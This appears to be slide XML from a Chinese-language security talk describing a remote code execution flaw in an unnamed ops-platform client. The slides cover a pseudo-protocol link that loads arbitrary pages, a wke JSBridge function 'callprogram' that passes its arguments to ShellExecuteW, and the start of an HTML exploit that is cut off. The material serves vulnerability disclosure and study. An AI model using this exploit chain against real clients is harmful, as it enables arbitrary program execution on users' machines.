              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>类客户端问题：某运维平台客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" charset="-122"/>
                <a:cs typeface="Microsoft YaHei" charset="-122"/>
              </a:rPr>
              <a:t>RCE</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"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30850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某运维平台客户端</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30BBDA0C-7BE4-3BFD-A6FF-86194A2769BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="333390" y="2012245"/>
            <a:ext cx="11525220" cy="3629286"/>
            <a:chOff x="140649" y="2349478"/>
            <a:chExt cx="11525220" cy="3629286"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D3E6678-F4A2-7654-8069-B1FF733F65B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="234778" y="3306976"/>
              <a:ext cx="2529381" cy="1897036"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="文本框 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02530B7-CF8C-C3E4-150D-8B6CB8CFA688}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="154095" y="2349478"/>
              <a:ext cx="5507225" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>某运维平台客户端存在任意端内页面加载，可以执行任意</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>文件。</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>伪协议链接：</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Xxx</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN"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err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>webview</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>/?</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>url</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>xxxx</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6C43ED-7234-BCA1-866A-C92B889F7296}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2878720" y="3306976"/>
              <a:ext cx="2863283" cy="1897036"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52490243-231C-11F8-BD9F-EBD2FA5D2A85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="140649" y="5393989"/>
              <a:ext cx="5507225" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>根据加载的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>DLL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>文件得知，其所依赖的前端页面渲染是基于</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0">
                  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>https://github.com/cexer/wke</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>开源</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCB7578-85AC-60B3-F1B2-1540B67696A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5915010" y="2349479"/>
              <a:ext cx="5750859" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>源代码</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>wke</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>jsBind.cpp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>中</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>，发现</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>wkeJSBindFunction</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>方法提供了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>JSBridge</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的功能，将</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>JavaScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>函数绑定到</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>C++</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>中</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>一个本地函数。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="文本框 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55CC593E-A959-C286-0983-325BCDB66CA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5915010" y="5389418"/>
              <a:ext cx="5750858" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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因此我们可以看看目标程序有没有去使用该方法，如果使用了是否可以加以利用。</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15" name="图片 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B548A018-3A77-F687-12B3-11C72A833B44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6062927" y="3280082"/>
              <a:ext cx="5455024" cy="1976733"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3129390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某运维平台客户端</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合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4B6C89-94FB-AF45-96F2-8A4220233CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="504638" y="2010244"/>
            <a:ext cx="11182724" cy="3576211"/>
            <a:chOff x="504638" y="2249394"/>
            <a:chExt cx="11182724" cy="3576211"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4193A197-E4E0-8D0D-569D-86137F2DDF02}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="598767" y="2249394"/>
              <a:ext cx="4889500" cy="1435100"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59ADDE7-AEB8-BCA1-1CC2-F0ED859B2AF1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504638" y="3801523"/>
              <a:ext cx="4889501" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>将</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>C++</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>某个函数地址，与名为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>callprogram</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>JavaScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>函数进行绑定，我们可以直接在</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>JS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>代码中调用。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="图片 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA08DD2E-A108-18EB-E2AE-20A24D999982}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6101690" y="2249394"/>
              <a:ext cx="5536570" cy="888451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="直线箭头连接符 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC98A7C5-A6B8-33A2-006F-278493D4500C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5646555" y="2696885"/>
              <a:ext cx="355576" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="文本框 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C650716-7494-95BC-830D-2D9D52EDD5B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6002131" y="3309335"/>
              <a:ext cx="5685231" cy="1323439"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>通过</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>wkeJSParam</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>获取参数，再通过</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>JSToTempStringW</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>获取字符串形式的参数值，最终将两个参数带入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>ShellExecuteW</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>函数执行。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>即最终执行：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>ShellExecuteW</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>(0, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>"open", </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>参数</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>参数</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>2, 0, 1)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="文本框 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310FE4FF-CAA9-6BBF-94C3-D258D4F7D3A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2183725" y="5240830"/>
              <a:ext cx="7824550" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr>
                <a:defRPr sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>最终</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>Exploit</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>，</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>构建</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>HTML</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>页面，通过伪链接打开即可</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>RCE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
                <a:t>：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
                <a:t>&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>callprogram</a:t>
              </a:r>
              <a:r>
